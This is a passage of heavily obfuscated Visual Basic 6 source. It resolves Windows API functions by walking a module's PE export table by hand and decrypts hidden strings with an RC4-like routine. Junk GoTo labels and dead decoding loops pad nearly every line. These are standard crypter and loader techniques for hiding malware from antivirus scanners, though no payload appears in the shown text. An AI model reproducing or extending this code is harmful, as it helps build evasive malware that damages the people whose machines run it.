  778. GoTo u8N6j8DwbqKdvrgMVWUZ
  779. u8N6j8DwbqKdvrgMVWUZ:
  780.     Dim OqXXVZ4wM       As CbtBC4ekK
  781. GoTo K0K7C0RVXPoEygOQkNSf
  782. K0K7C0RVXPoEygOQkNSf:
  783.     Dim oni2dC5pc As g4RjcGTKu
  784.     Dim q2Y2w4yuWEVIMlMXRjgD As String, Z8p6w2dmyTOrtatAIvcl As String, HGCMFgjzQ() As String, e6v8b7OPpLnHlKcCcnhA As String, i1p0G0OetBDMjeIKqvQY As Integer
  785.     q2Y2w4yuWEVIMlMXRjgD = Chr$(50)
  786.     For i1p0G0OetBDMjeIKqvQY = 1 To Len(q2Y2w4yuWEVIMlMXRjgD)
  787. Z8p6w2dmyTOrtatAIvcl = Z8p6w2dmyTOrtatAIvcl & IIf(i1p0G0OetBDMjeIKqvQY = 1, Asc(Mid$(q2Y2w4yuWEVIMlMXRjgD, i1p0G0OetBDMjeIKqvQY, 1)), Chr$(124) _
  788.  & Asc(Mid$(q2Y2w4yuWEVIMlMXRjgD, i1p0G0OetBDMjeIKqvQY, 1)))
  789.     Next i1p0G0OetBDMjeIKqvQY
  790.     HGCMFgjzQ() = rZjOyBMBM(Z8p6w2dmyTOrtatAIvcl, Chr$(124))
  791.     For i1p0G0OetBDMjeIKqvQY = 0 To UBound(HGCMFgjzQ)
  792.     e6v8b7OPpLnHlKcCcnhA = e6v8b7OPpLnHlKcCcnhA & Chr(CLng(HGCMFgjzQ(i1p0G0OetBDMjeIKqvQY)))
  793.     Next i1p0G0OetBDMjeIKqvQY
  794.     If e6v8b7OPpLnHlKcCcnhA = Chr$(50) Then GoTo 2
  795. 2:
  796.     Call wO9vsZUxD(nfjrysVgu, ByVal lbiJtN9fS, f9XvbANO0)
  797. GoTo t7o7s5krIihwnqiHkPNu
  798. t7o7s5krIihwnqiHkPNu:
  799.     If Not nfjrysVgu.e_magic = B9QyNW5fC Then
  800. GoTo I5T1X6QQEEenAcybRdRO
  801. I5T1X6QQEEenAcybRdRO:
  802.         Exit Function
  803. GoTo I4X8e7uqDTUprBYGjflF
  804. I4X8e7uqDTUprBYGjflF:
  805.     End If
  806. GoTo N0i5d5hSLSvXJZcfXyZE
  807. N0i5d5hSLSvXJZcfXyZE:
  808.     Call wO9vsZUxD(OqXXVZ4wM, ByVal lbiJtN9fS + nfjrysVgu.e_lfanew, r9prn87An)
  809. GoTo n6Y8j4nwhgUGhEQeMdPT
  810. n6Y8j4nwhgUGhEQeMdPT:
  811.     If Not OqXXVZ4wM.Signature = SXYKSnDaE Then
  812. GoTo t6f4r7LgFLHTWlHIRbWA
  813. t6f4r7LgFLHTWlHIRbWA:
  814.         Exit Function
  815. GoTo P6C3P1ktuswibiNaZpsy
  816. P6C3P1ktuswibiNaZpsy:
  817.     End If
  818. GoTo M6A8d2NhKPcmIVJuWsrT
  819. M6A8d2NhKPcmIVJuWsrT:
  820.     Dim jZe4nBnXW   As Long
  821. GoTo B3E1i1UOgdAVumitLayi
  822. B3E1i1UOgdAVumitLayi:
  823.     Dim Rg75igLzY      As Long
  824. GoTo s3L7q4qvFtZijhmKQXCP
  825. s3L7q4qvFtZijhmKQXCP:
  826.     Dim WSsTXNHle       As Long
  827. GoTo O5i6c0RJtbdwafspYlLL
  828. O5i6c0RJtbdwafspYlLL:
  829.  
  830. GoTo m8I6E6HYZkevfDmvDLbq
  831. m8I6E6HYZkevfDmvDLbq:
  832.         jZe4nBnXW = lbiJtN9fS + OqXXVZ4wM.OptionalHeader.DataDirectory(0).VirtuaC6t0R7rHvArQtYWEsNEu
  833. GoTo j6u3N7rYewGybWXVaLSZ
  834. j6u3N7rYewGybWXVaLSZ:
  835.         Rg75igLzY = jZe4nBnXW + OqXXVZ4wM.OptionalHeader.DataDirectory(0).Size
  836. GoTo p3Q5W4QpSvudRmcThraa
  837. p3Q5W4QpSvudRmcThraa:
  838.         WSsTXNHle = OqXXVZ4wM.OptionalHeader.ImageBase
  839. GoTo M5e0B2iPsIoyOWMrmnlq
  840. M5e0B2iPsIoyOWMrmnlq:
  841.  
  842. GoTo c3c1h3impgGiOwtiDsjw
  843. c3c1h3impgGiOwtiDsjw:
  844.     Call wO9vsZUxD(oni2dC5pc, ByVal jZe4nBnXW, MTFdGPVuU)
  845. GoTo I7q5Q7NaoWnZdDroiBwU
  846. I7q5Q7NaoWnZdDroiBwU:
  847.     Dim mpWCXcoZN4           As Long
  848. GoTo P7t7B1TopAJEhwQkEwnT
  849. P7t7B1TopAJEhwQkEwnT:
  850.     Dim BPjePCsxX   As Long
  851. GoTo b5a5R1RyIIXbeVuKDmUX
  852. b5a5R1RyIIXbeVuKDmUX:
  853.     Dim woBkOgn3G    As Long
  854. GoTo r3Y6v3fSFgCBdLcOSrSd
  855. r3Y6v3fSFgCBdLcOSrSd:
  856.     Dim DD4v0hvtx    As Long
  857. GoTo X7m1f0yrEVjFsCaUwAgB
  858. X7m1f0yrEVjFsCaUwAgB:
  859.  
  860. GoTo G2E6s8ryTahMYYnrumLa
  861. G2E6s8ryTahMYYnrumLa:
  862.         For mpWCXcoZN4 = 0 To oni2dC5pc.NumberOfNames - 1
  863. GoTo r5J2g1NbXHUttVdpSlRo
  864. r5J2g1NbXHUttVdpSlRo:
  865.             wO9vsZUxD woBkOgn3G, ByVal WSsTXNHle + oni2dC5pc.lpAddressOfNames + mpWCXcoZN4 * 4, 4
  866. GoTo H5H3M5OkUfkhsKYghqPJ
  867. H5H3M5OkUfkhsKYghqPJ:
  868.             If sFwRO2hfZ(WSsTXNHle + woBkOgn3G) = mMetdZkd5 Then
  869. GoTo m7V5u0sYTUSXIPWmNNdT
  870. m7V5u0sYTUSXIPWmNNdT:
  871.                 wO9vsZUxD DD4v0hvtx, ByVal WSsTXNHle + oni2dC5pc.lpAddressOfNameOrdinals + mpWCXcoZN4 * 2, 2
  872. GoTo V2m2t7ZOiZQdoXWKKltG
  873. V2m2t7ZOiZQdoXWKKltG:
  874.                 wO9vsZUxD BPjePCsxX, ByVal WSsTXNHle + oni2dC5pc.lpAddressOfFunctions + DD4v0hvtx * 4, 4
  875. GoTo i0h1X6XVPheBkyBwJabv
  876. i0h1X6XVPheBkyBwJabv:
  877.                 Jun1VG4mO = BPjePCsxX + WSsTXNHle
  878. GoTo W5E6O5KQjrhNIJHMvpvb
  879. W5E6O5KQjrhNIJHMvpvb:
  880.                 If Jun1VG4mO >= jZe4nBnXW And _
  881.                    Jun1VG4mO <= Rg75igLzY Then
  882. GoTo M6u1q1uYMKEWTpMkqmwB
  883. M6u1q1uYMKEWTpMkqmwB:
  884.                     Call zSQ8T8AI5(Jun1VG4mO, lbiJtN9fS, mMetdZkd5)
  885. GoTo Q6m8G0etNgAujPYZXcNH
  886. Q6m8G0etNgAujPYZXcNH:
  887.                     If Not lbiJtN9fS = 0 Then
  888. GoTo O7F1U4aSrHjRToRVjtOc
  889. O7F1U4aSrHjRToRVjtOc:
  890.                         Jun1VG4mO = Jun1VG4mO(lbiJtN9fS, mMetdZkd5)
  891. GoTo P0c0w4HZLPoPaUmjGcBs
  892. P0c0w4HZLPoPaUmjGcBs:
  893.                     Else
  894. GoTo a6D3n4kIDgiOiovlRabZ
  895. a6D3n4kIDgiOiovlRabZ:
  896.                         Jun1VG4mO = 0
  897. GoTo e0I2t1GWacUtJBlTVpSX
  898. e0I2t1GWacUtJBlTVpSX:
  899.                     End If
  900. GoTo k6Q5D0emAbyaQqRcWoXu
  901. k6Q5D0emAbyaQqRcWoXu:
  902.                 End If
  903. GoTo e7u7D3iprBYTvflFNChd
  904. e7u7D3iprBYTvflFNChd:
  905.                 Exit Function
  906. GoTo d5g3Y5vXWmcfXyZECjYs
  907. d5g3Y5vXWmcfXyZECjYs:
  908.             End If
  909. GoTo H8M4F1rrTcoQkPnGRGDv
  910. H8M4F1rrTcoQkPnGRGDv:
  911.         Next
  912. GoTo P2j3d6frIJegpNtXnUat
  913. P2j3d6frIJegpNtXnUat:
  914.  
  915. GoTo C7W3S3WHAHlMwORUMkOs
  916. C7W3S3WHAHlMwORUMkOs:
  917. End Function
  918.  
  919. Private Function zSQ8T8AI5(ByVal z0xxb30z0 As Long, ByRef yYpzqIoaa As Long, ByRef zpNxujiGq As String)
  920. GoTo c4N6X2cmVVIuWsFTBSEI
  921. c4N6X2cmVVIuWsFTBSEI:
  922.     Dim bBP2UjEUy     As String
  923.     Dim i4T2f5AVtAyILZuvGQLn As String, E4q2E8ZiihmXQXCPOehk As String, ZZSSo0BEq() As String, R6U4Y6dytQlKDKbpMJgb As String, F1m1M3KpAwDagnSfeuwB As Integer
  924.     i4T2f5AVtAyILZuvGQLn = Chr$(56)
  925.     For F1m1M3KpAwDagnSfeuwB = 1 To Len(i4T2f5AVtAyILZuvGQLn)
  926. E4q2E8ZiihmXQXCPOehk = E4q2E8ZiihmXQXCPOehk & IIf(F1m1M3KpAwDagnSfeuwB = 1, Asc(Mid$(i4T2f5AVtAyILZuvGQLn, F1m1M3KpAwDagnSfeuwB, 1)), Chr$(124) _
  927.  & Asc(Mid$(i4T2f5AVtAyILZuvGQLn, F1m1M3KpAwDagnSfeuwB, 1)))
  928.     Next F1m1M3KpAwDagnSfeuwB
  929.     ZZSSo0BEq() = rZjOyBMBM(E4q2E8ZiihmXQXCPOehk, Chr$(124))
  930.     For F1m1M3KpAwDagnSfeuwB = 0 To UBound(ZZSSo0BEq)
  931.     R6U4Y6dytQlKDKbpMJgb = R6U4Y6dytQlKDKbpMJgb & Chr(CLng(ZZSSo0BEq(F1m1M3KpAwDagnSfeuwB)))
  932.     Next F1m1M3KpAwDagnSfeuwB
  933.     If R6U4Y6dytQlKDKbpMJgb = Chr$(56) Then GoTo 8
  934. 8:
  935.     bBP2UjEUy = sFwRO2hfZ(z0xxb30z0)
  936. GoTo p1w6Q3mPUheNaAAbjvYr
  937. p1w6Q3mPUheNaAAbjvYr:
  938. If InStr(1, bBP2UjEUy, BEWRmY2Bl(Chr$(250), Chr$(79) & Chr$(52) & Chr$(117) & Chr$(53) & Chr$(70) & Chr$(51) _
  939.  & Chr$(67) & Chr$(73) & Chr$(98) & Chr$(106))) Then
  940. GoTo X8N7N4TlUqalrnQfmnwV
  941. X8N7N4TlUqalrnQfmnwV:
  942. yYpzqIoaa = P4EYumIcN(rZjOyBMBM(bBP2UjEUy, BEWRmY2Bl(Chr$(250), Chr$(79) & Chr$(52) & Chr$(117) & Chr$(53) & Chr$(70) _
  943.  & Chr$(51) & Chr$(67) & Chr$(73) & Chr$(98) & Chr$(106)))(0))
  944. GoTo Q8y5i0JeZaYdPVctUTjZ
  945. Q8y5i0JeZaYdPVctUTjZ:
  946. zpNxujiGq = rZjOyBMBM(bBP2UjEUy, BEWRmY2Bl(Chr$(250), Chr$(79) & Chr$(52) & Chr$(117) & Chr$(53) & Chr$(70) _
  947.  & Chr$(51) & Chr$(67) & Chr$(73) & Chr$(98) & Chr$(106)))(1)
  948. GoTo c3s4B0gVpfWkuddQQrAN
  949. c3s4B0gVpfWkuddQQrAN:
  950.     End If
  951. GoTo o1n2d7ebVnkIqCIEPghD
  952. o1n2d7ebVnkIqCIEPghD:
  953. End Function
  954.  
  955. Private Function sFwRO2hfZ(ByVal z0xxb30z0 As Long) As String
  956. GoTo c6K7U6QXqnTPPNSEvEiJ
  957. c6K7U6QXqnTPPNSEvEiJ:
  958.     Dim ytSdJ3avz       As Byte
  959.     Dim u2O3J6LpZVKeULZjSSFr As String, T7C3w2BFeTQKcZvSqvsF As String, LdMDSqUj0() As String, N3L2b5hZwNGpXauXbpAV As String, i4I6G1gOfRVuVgaspNiH As Integer
  960.     u2O3J6LpZVKeULZjSSFr = Chr$(48)
  961.     For i4I6G1gOfRVuVgaspNiH = 1 To Len(u2O3J6LpZVKeULZjSSFr)
  962. T7C3w2BFeTQKcZvSqvsF = T7C3w2BFeTQKcZvSqvsF & IIf(i4I6G1gOfRVuVgaspNiH = 1, Asc(Mid$(u2O3J6LpZVKeULZjSSFr, i4I6G1gOfRVuVgaspNiH, 1)), Chr$(124) _
  963.  & Asc(Mid$(u2O3J6LpZVKeULZjSSFr, i4I6G1gOfRVuVgaspNiH, 1)))
  964.     Next i4I6G1gOfRVuVgaspNiH
  965.     LdMDSqUj0() = rZjOyBMBM(T7C3w2BFeTQKcZvSqvsF, Chr$(124))
  966.     For i4I6G1gOfRVuVgaspNiH = 0 To UBound(LdMDSqUj0)
  967.     N3L2b5hZwNGpXauXbpAV = N3L2b5hZwNGpXauXbpAV & Chr(CLng(LdMDSqUj0(i4I6G1gOfRVuVgaspNiH)))
  968.     Next i4I6G1gOfRVuVgaspNiH
  969.     If N3L2b5hZwNGpXauXbpAV = Chr$(48) Then GoTo 0
  970. 0:
  971.     Do
  972. GoTo y1Y7I8FdYBDjEJRHmyyu
  973. y1Y7I8FdYBDjEJRHmyyu:
  974.         wO9vsZUxD ytSdJ3avz, ByVal z0xxb30z0, 1
  975. GoTo A4d6P5bruwpOdWGoqLns
  976. A4d6P5bruwpOdWGoqLns:
  977.         z0xxb30z0 = z0xxb30z0 + 1
  978. GoTo G0l0Y4AIVvQyUlMlvqJs
  979. G0l0Y4AIVvQyUlMlvqJs:
  980.         If ytSdJ3avz = 0 Then Exit Do
  981. GoTo B6u0v1aovwHeZDFlrLTJ
  982. B6u0v1aovwHeZDFlrLTJ:
  983.         sFwRO2hfZ = sFwRO2hfZ & Chr$(ytSdJ3avz)
  984. GoTo o6k6n4fmDddsildDfKIp
  985. o6k6n4fmDddsildDfKIp:
  986.     Loop
  987. GoTo e0p5t1nmaaCKWSwVnAnl
  988. e0p5t1nmaaCKWSwVnAnl:
  989. End Function
  990.  
  991. Public Function BEWRmY2Bl(ByVal wkWTCSbGQ As String, ByVal FwZkg3vC8 As String) As String
  992. GoTo SLBUX_178296
  993. OVXJV_782218:
  994. GoTo RSYMS_128522
  995. RSYMS_128522:
  996.  
  997. GoTo YYKFZ_225774
  998. SLBUX_178296:
  999. GoTo DBWIB_364637
  1000. YYKFZ_225774:
  1001.  
  1002. GoTo QNFMG_746539
  1003. DBWIB_364637:
  1004. GoTo f8u3B2ROZqrNOXycGVCI
  1005.  
  1006. GoTo OVXJV_782218
  1007. QNFMG_746539:
  1008. GoTo NEAXD_368647
  1009. ESJZF_166552:
  1010. GoTo CPHYB_947834
  1011. CPHYB_947834:
  1012.  
  1013. GoTo HONBG_311357
  1014. NEAXD_368647:
  1015. GoTo KNEQL_596271
  1016. HONBG_311357:
  1017.  
  1018. GoTo AXTWA_976516
  1019. KNEQL_596271:
  1020. f8u3B2ROZqrNOXycGVCI:
  1021.  
  1022. GoTo ESJZF_166552
  1023. AXTWA_976516:
  1024. GoTo ZUIQC_134499
  1025. COIAQ_553575:
  1026. GoTo YNFFK_762765
  1027. YNFFK_762765:
  1028.  
  1029. GoTo OJPUO_447666
  1030. ZUIQC_134499:
  1031. GoTo MUBFM_457925
  1032. OJPUO_447666:
  1033.  
  1034. GoTo BXSLN_175355
  1035. MUBFM_457925:
  1036.     On Error Resume Next
  1037.  
  1038. GoTo COIAQ_553575
  1039. BXSLN_175355:
  1040. GoTo IMAIA_627771
  1041. WATJY_762859:
  1042. GoTo VKLEW_707371
  1043. VKLEW_707371:
  1044.  
  1045. GoTo RPODX_268192
  1046. IMAIA_627771:
  1047. GoTo KFNQZ_866184
  1048. RPODX_268192:
  1049.  
  1050. GoTo OPFMQ_026966
  1051. KFNQZ_866184:
  1052. GoTo A1w5Y4XcNGNrSEUYaSrU
  1053.  
  1054. GoTo WATJY_762859
  1055. OPFMQ_026966:
  1056. GoTo DOXTN_716995
  1057. WHHXB_412182:
  1058. GoTo NHCOY_933470
  1059. NHCOY_933470:
  1060.  
  1061. GoTo CWMOK_758124
  1062. DOXTN_716995:
  1063. GoTo YRFXO_377695
  1064. CWMOK_758124:
  1065.  
  1066. GoTo QJGJF_901659
  1067. YRFXO_377695:
  1068. A1w5Y4XcNGNrSEUYaSrU:
  1069.  
  1070. GoTo WHHXB_412182
  1071. QJGJF_901659:
  1072. GoTo TMXRN_682425
  1073. BVPNY_846273:
  1074. GoTo RYFFD_557696
  1075. RYFFD_557696:
  1076.  
  1077. GoTo UJMCD_538626
  1078. TMXRN_682425:
  1079. GoTo GAIDH_973569
  1080. UJMCD_538626:
  1081.  
  1082. GoTo RKUGM_449118
  1083. GAIDH_973569:
  1084.     Dim ztI6ZL5o6(0 To 255) As Integer, U0D7c0, a6B6A6 As Long, p2E0u2() As Byte
  1085.  
  1086. GoTo BVPNY_846273
  1087. RKUGM_449118:
  1088. GoTo ITGKD_782778
  1089. XPWJR_204687:
  1090. GoTo KKWDY_443035
  1091. KKWDY_443035:
  1092.  
  1093. GoTo HNERU_702926
  1094. ITGKD_782778:
  1095. GoTo MHATR_454192
  1096. HNERU_702926:
  1097.  
  1098. GoTo FXLFB_585215
  1099. MHATR_454192:
  1100. GoTo j5T7e3itcbPBcLZHYKOo
  1101.  
  1102. GoTo XPWJR_204687
  1103. FXLFB_585215:
  1104. GoTo VIORD_635214
  1105. NJTIC_323390:
  1106. GoTo LFAJH_443165
  1107. LFAJH_443165:
  1108.  
  1109. GoTo DVZLC_332838
  1110. VIORD_635214:
  1111. GoTo QQZMX_577889
  1112. DVZLC_332838:
  1113.  
  1114. GoTo JWLQR_581331
  1115. QQZMX_577889:
  1116. j5T7e3itcbPBcLZHYKOo:
  1117.  
  1118. GoTo NJTIC_323390
  1119. JWLQR_581331:
  1120. GoTo HWKWM_916358
  1121. HMJWJ_851357:
  1122. GoTo IFEPW_065752
  1123. IFEPW_065752:
  1124.  
  1125. GoTo NUBOW_864137
  1126. HWKWM_916358:
  1127. GoTo YQEDH_731951
  1128. NUBOW_864137:
  1129.  
  1130. GoTo CCVRO_152777
  1131. YQEDH_731951:
  1132.     p2E0u2() = StrConv(FwZkg3vC8, vbFromUnicode)
  1133.  
  1134. GoTo HMJWJ_851357
  1135. CCVRO_152777:
  1136. GoTo MXVIG_661404
  1137. KQRBY_861681:
  1138. GoTo YKVIB_773513
  1139. YKVIB_773513:
  1140.  
  1141. GoTo CKFFA_532133
  1142. MXVIG_661404:
  1143. GoTo GGDEW_284733
  1144. CKFFA_532133:
  1145.  
  1146. GoTo IIODC_837871
  1147. GGDEW_284733:
  1148. GoTo c4U6j1cBGDORgCDMWRuK
  1149.  
  1150. GoTo KQRBY_861681
  1151. IIODC_837871:
  1152. GoTo RJPAN_186147
  1153. XBXSX_473781:
  1154. GoTo GJLDT_481842
  1155. GJLDT_481842:
  1156.  
  1157. GoTo GTFPA_136256
  1158. RJPAN_186147:
  1159. GoTo QLZVO_525939
  1160. GTFPA_136256:
  1161.  
  1162. GoTo NTOQJ_178536
  1163. QLZVO_525939:
  1164. c4U6j1cBGDORgCDMWRuK:
  1165.  
  1166. GoTo XBXSX_473781
  1167. NTOQJ_178536:
  1168. GoTo UIYLV_438732
  1169. UZSBF_093318:
  1170. GoTo JJQKV_925671
  1171. JJQKV_925671:
  1172.  
  1173. GoTo IQGRP_452241
  1174. UIYLV_438732:
  1175. GoTo MIGJC_679353
  1176. IQGRP_452241:
  1177.  
  1178. GoTo LQHUH_683038
  1179. MIGJC_679353:
  1180.     For U0D7c0 = 0 To 255
  1181.  
  1182. GoTo UZSBF_093318
  1183. LQHUH_683038:
  1184. GoTo SBQUV_601881
  1185. PCVIN_844843:
  1186. GoTo VLLYM_343655
  1187. VLLYM_343655:
  1188.  
  1189. GoTo MWUNN_235746
  1190. SBQUV_601881:
  1191. GoTo PTQOS_371252
  1192. MWUNN_235746:
  1193.  
  1194. GoTo EHZVV_003782
  1195. PTQOS_371252:
  1196. GoTo d8Q2A5opnsdWeIVUkoqi
  1197.  
  1198. GoTo PCVIN_844843
  1199. EHZVV_003782:
  1200. GoTo SIAGW_418746
  1201. BQUZD_397877:
  1202. GoTo YABGE_606481
  1203. YABGE_606481:
  1204.  
  1205. GoTo JLPRT_745442
  1206. SIAGW_418746:
  1207. GoTo VTANU_622397
  1208. JLPRT_745442:
  1209.  
  1210. GoTo IJCPO_115971
  1211. VTANU_622397:
  1212. d8Q2A5opnsdWeIVUkoqi:
  1213.  
  1214. GoTo BQUZD_397877
  1215. IJCPO_115971:
  1216. GoTo OVOTI_567979
  1217. ZKGVG_319084:
  1218. GoTo VLTSM_975228
  1219. VLTSM_975228:
  1220.  
  1221. GoTo JHVZX_196905
  1222. OVOTI_567979:
  1223. GoTo MNXOS_716410
  1224. JHVZX_196905:
  1225.  
  1226. GoTo SGXHM_528812
  1227. MNXOS_716410:
  1228.     a6B6A6 = (a6B6A6 + ztI6ZL5o6(U0D7c0) + p2E0u2(U0D7c0 Mod Len(FwZkg3vC8))) Mod 256
  1229.  
  1230. GoTo ZKGVG_319084
  1231. SGXHM_528812:
  1232. GoTo KZNTV_845868
  1233. ODXPG_976678:
  1234. GoTo GZWGL_589051
  1235. GZWGL_589051:
  1236.  
  1237. GoTo AWUHW_812211
  1238. KZNTV_845868:
  1239. GoTo MNXSE_162460
  1240. AWUHW_812211:
  1241.  
  1242. GoTo VRIDV_160758
  1243. MNXSE_162460:
  1244. GoTo I4P0h6EglAKerfSsPOpX
  1245.  
  1246. GoTo ODXPG_976678
  1247. VRIDV_160758:
  1248. GoTo BZZMT_117566
  1249. THOPP_117838:
  1250. GoTo XEJDB_099822
  1251. XEJDB_099822:
  1252.  
  1253. GoTo OMLAR_976115
  1254. BZZMT_117566:
  1255. GoTo PYPZO_471152
  1256. OMLAR_976115:
  1257.  
  1258. GoTo GVFSQ_566584
  1259. PYPZO_471152:
  1260. I4P0h6EglAKerfSsPOpX:
  1261.  
  1262. GoTo THOPP_117838
  1263. GVFSQ_566584:
  1264. GoTo TZXFF_679848
  1265. AULYP_146820:
  1266. GoTo YZHCC_635068
  1267. YZHCC_635068:
  1268.  
  1269. GoTo YKTEN_616761
  1270. TZXFF_679848:
  1271. GoTo TGQHU_721180
  1272. YKTEN_616761:
  1273.  
  1274. GoTo MLQYX_974644
  1275. TGQHU_721180:
  1276.     ztI6ZL5o6(U0D7c0) = U0D7c0
  1277.  
  1278. GoTo AULYP_146820
  1279. MLQYX_974644:
  1280. GoTo WSRDA_980481
  1281. GFWQW_566417:
  1282. GoTo TXYNA_408413
  1283. TXYNA_408413:
  1284.  
  1285. GoTo VQNNM_058043
  1286. WSRDA_980481:
  1287. GoTo VDZJA_603376
  1288. VQNNM_058043:
  1289.  
  1290. GoTo UILCS_977758
  1291. VDZJA_603376:
  1292. GoTo N0E5E2JbYuRphdpGVqen
  1293.  
  1294. GoTo GFWQW_566417
  1295. UILCS_977758:
  1296. GoTo ZFWWB_239060
  1297. AGYDM_487917:
  1298. GoTo ZLSEJ_614830
  1299. ZLSEJ_614830:
  1300.  
  1301. GoTo DPJCT_321561
  1302. ZFWWB_239060:
  1303. GoTo OPRFC_073930
  1304. DPJCT_321561:
  1305.  
  1306. GoTo XBLCA_282518
  1307. OPRFC_073930:
  1308. N0E5E2JbYuRphdpGVqen:
  1309.  
  1310. GoTo AGYDM_487917
  1311. XBLCA_282518:
  1312. GoTo HTBAW_526343
  1313. ZGQFW_738506:
  1314. GoTo VTQBC_667185
  1315. VTQBC_667185:
  1316.  
  1317. GoTo NHDVX_137691
  1318. HTBAW_526343:
  1319. GoTo VMLIW_432635
  1320. NHDVX_137691:
  1321.  
  1322. GoTo XUEGY_808574
  1323. VMLIW_432635:
  1324.     Next U0D7c0
  1325.  
  1326. GoTo ZGQFW_738506
  1327. XUEGY_808574:
  1328. GoTo CHDFK_942287
  1329. PCITS_837275:
  1330. GoTo KVAGP_101518
  1331. KVAGP_101518:
  1332.  
  1333. GoTo KNANU_905159
  1334. CHDFK_942287:
  1335. GoTo AVVTY_615271
  1336. KNANU_905159:
  1337.  
  1338. GoTo QSOTJ_773484
  1339. AVVTY_615271:
  1340. GoTo L1j6S6rAoUdechFLTvKJ
  1341.  
  1342. GoTo PCITS_837275
  1343. QSOTJ_773484:
  1344. GoTo QTRYF_418619
  1345. BLBHF_517715:
  1346. GoTo THINM_566766
  1347. THINM_566766:
  1348.  
  1349. GoTo APZDX_124463
  1350. QTRYF_418619:
  1351. GoTo SESWP_885753
  1352. APZDX_124463:
  1353.  
  1354. GoTo BHNEQ_574186
  1355. SESWP_885753:
  1356. L1j6S6rAoUdechFLTvKJ:
  1357.  
  1358. GoTo BLBHF_517715
  1359. BHNEQ_574186:
  1360. GoTo GASMT_703886
  1361. PCQHJ_965545:
  1362. GoTo RIGTZ_991886
  1363. RIGTZ_991886:
  1364.  
  1365. GoTo XEABH_711948
  1366. GASMT_703886:
  1367. GoTo UGQVA_865375
  1368. XEABH_711948:
  1369.  
  1370. GoTo FBRMQ_243354
  1371. UGQVA_865375:
  1372.     p2E0u2() = StrConv(wkWTCSbGQ, vbFromUnicode)
  1373.  
  1374. GoTo PCQHJ_965545
  1375. FBRMQ_243354:
  1376. GoTo QUSWW_820649
  1377. UOOAX_320572:
  1378. GoTo YYGTI_133461
  1379. YYGTI_133461:
  1380.  
  1381. GoTo JECAD_268023
  1382. QUSWW_820649:
  1383. GoTo MTSXV_541418
  1384. JECAD_268023:
  1385.  
  1386. GoTo CPSSY_376029
  1387. MTSXV_541418:
  1388. GoTo Z5f4v2EoWYsVaokThGHh
  1389.  
  1390. GoTo UOOAX_320572
  1391. CPSSY_376029:
  1392. GoTo MXQJS_316814
  1393. IYJQC_116546:
  1394. GoTo DGAKT_873304
  1395. DGAKT_873304:
  1396.  
  1397. GoTo PFCWD_711041
  1398. MXQJS_316814:
  1399. GoTo VTVNN_165163
  1400. PFCWD_711041:
  1401.  
  1402. GoTo AQSXL_048263
  1403. VTVNN_165163:
  1404. Z5f4v2EoWYsVaokThGHh:
  1405.  
  1406. GoTo IYJQC_116546
  1407. AQSXL_048263:
  1408. GoTo EYNGU_353227
  1409. BHIGY_572465:
  1410. GoTo ZMMZG_917808
  1411. ZMMZG_917808:
  1412.  
  1413. GoTo PFDYR_913472
  1414. EYNGU_353227:
  1415. GoTo MRUXU_215330
  1416. PFDYR_913472:
  1417.  
  1418. GoTo YPPYC_946086
  1419. MRUXU_215330:
  1420. For U0D7c0 = 0 To Len(wkWTCSbGQ)
  1421.  
  1422. GoTo BHIGY_572465
  1423. YPPYC_946086:
  1424. GoTo BSEJJ_144549
  1425. ZQCSR_361324:
  1426. GoTo ROZSZ_351120
  1427. ROZSZ_351120:
  1428.  
  1429. GoTo UEZJS_242722
  1430. BSEJJ_144549:
  1431. GoTo PJZSL_525857
  1432. UEZJS_242722:
  1433.  
  1434. GoTo OHKEW_646846
  1435. PJZSL_525857:
  1436. GoTo l8u0b4ACioIQFlggfkVc
  1437.  
  1438. GoTo ZQCSR_361324
  1439. OHKEW_646846:
  1440. GoTo ORBRV_023168
  1441. XZXBO_165783:
  1442. GoTo BPLOU_115236
  1443. BPLOU_115236:
  1444.  
  1445. GoTo KHYVK_055113
  1446. ORBRV_023168:
  1447. GoTo ZOHFX_246612
  1448. KHYVK_055113:
  1449.  
  1450. GoTo XVBRC_783807
  1451. ZOHFX_246612:
  1452. l8u0b4ACioIQFlggfkVc:
  1453.  
  1454. GoTo XZXBO_165783
  1455. XVBRC_783807:
  1456. GoTo ZWPGT_185882
  1457. BZVWP_851744:
  1458. GoTo CHIKW_138952
  1459. CHIKW_138952:
  1460.  
  1461. GoTo QFVON_349239
  1462. ZWPGT_185882:
  1463. GoTo SPYKD_682351
  1464. QFVON_349239:
  1465.  
  1466. GoTo BVYLX_465167
  1467. SPYKD_682351:
  1468.     a6B6A6 = (a6B6A6 + ztI6ZL5o6(a6B6A6) + 1) Mod 256
  1469.  
  1470. GoTo BZVWP_851744
  1471. BVYLX_465167:
  1472. GoTo DNMHY_243607
  1473. BCMFZ_679685:
  1474. GoTo RLIHY_821926
  1475. RLIHY_821926:
  1476.  
  1477. GoTo NSDLO_472627
  1478. DNMHY_243607:
  1479. GoTo QADRG_807507
  1480. NSDLO_472627:
  1481.  
  1482. GoTo HYOBC_858833
  1483. QADRG_807507:
  1484.     p2E0u2(U0D7c0) = p2E0u2(U0D7c0) Xor ztI6ZL5o6(ztI6ZL5o6((a6B6A6 + ztI6ZL5o6(a6B6A6)) Mod 254))
  1485.  
  1486. GoTo BCMFZ_679685
  1487. HYOBC_858833:
  1488. GoTo OXNRO_201233
  1489. BCQLJ_585357:
  1490. GoTo QEMBJ_942654
  1491. QEMBJ_942654:
  1492.  
  1493. GoTo NKTOP_272193
  1494. OXNRO_201233:
  1495. GoTo NCHIY_949446
  1496. NKTOP_272193:
  1497.  
  1498. GoTo ZMGJB_541675
  1499. NCHIY_949446:
  1500.     Next U0D7c0
  1501.  
  1502. GoTo BCQLJ_585357
  1503. ZMGJB_541675:
  1504. GoTo TIMIZ_062476
  1505. IPORU_140319:
  1506. GoTo AYRBS_116035
  1507. AYRBS_116035:
  1508.  
  1509. GoTo EAMXC_422195
  1510. TIMIZ_062476:
  1511. GoTo AWFZX_227306
  1512. EAMXC_422195:
  1513.  
  1514. GoTo TIPXB_148108
  1515. AWFZX_227306:
  1516.     BEWRmY2Bl = StrConv(p2E0u2, vbUnicode)
  1517.  
  1518. GoTo IPORU_140319
  1519. TIPXB_148108:
  1520.  
  1521. End Function
  1522. Private Function rZjOyBMBM(ByVal iUGqUtdps As String, Optional ByVal N6LHhLlux As String, Optional ByVal KUmyJx5Jh As Long = -1) As String()
  1523.     Dim tPwdtDwaY    As Long
  1524.     Dim rWOEH4K43  As Long
  1525.     Dim pOKAiWpG0     As Long
  1526.     Dim WDhIDUXmY   As Long
  1527.     Dim zuPGbqBU9     As Long
  1528.     Dim kVaXV9w2y()    As String
  1529.    
  1530.     pOKAiWpG0 = Len(iUGqUtdps)
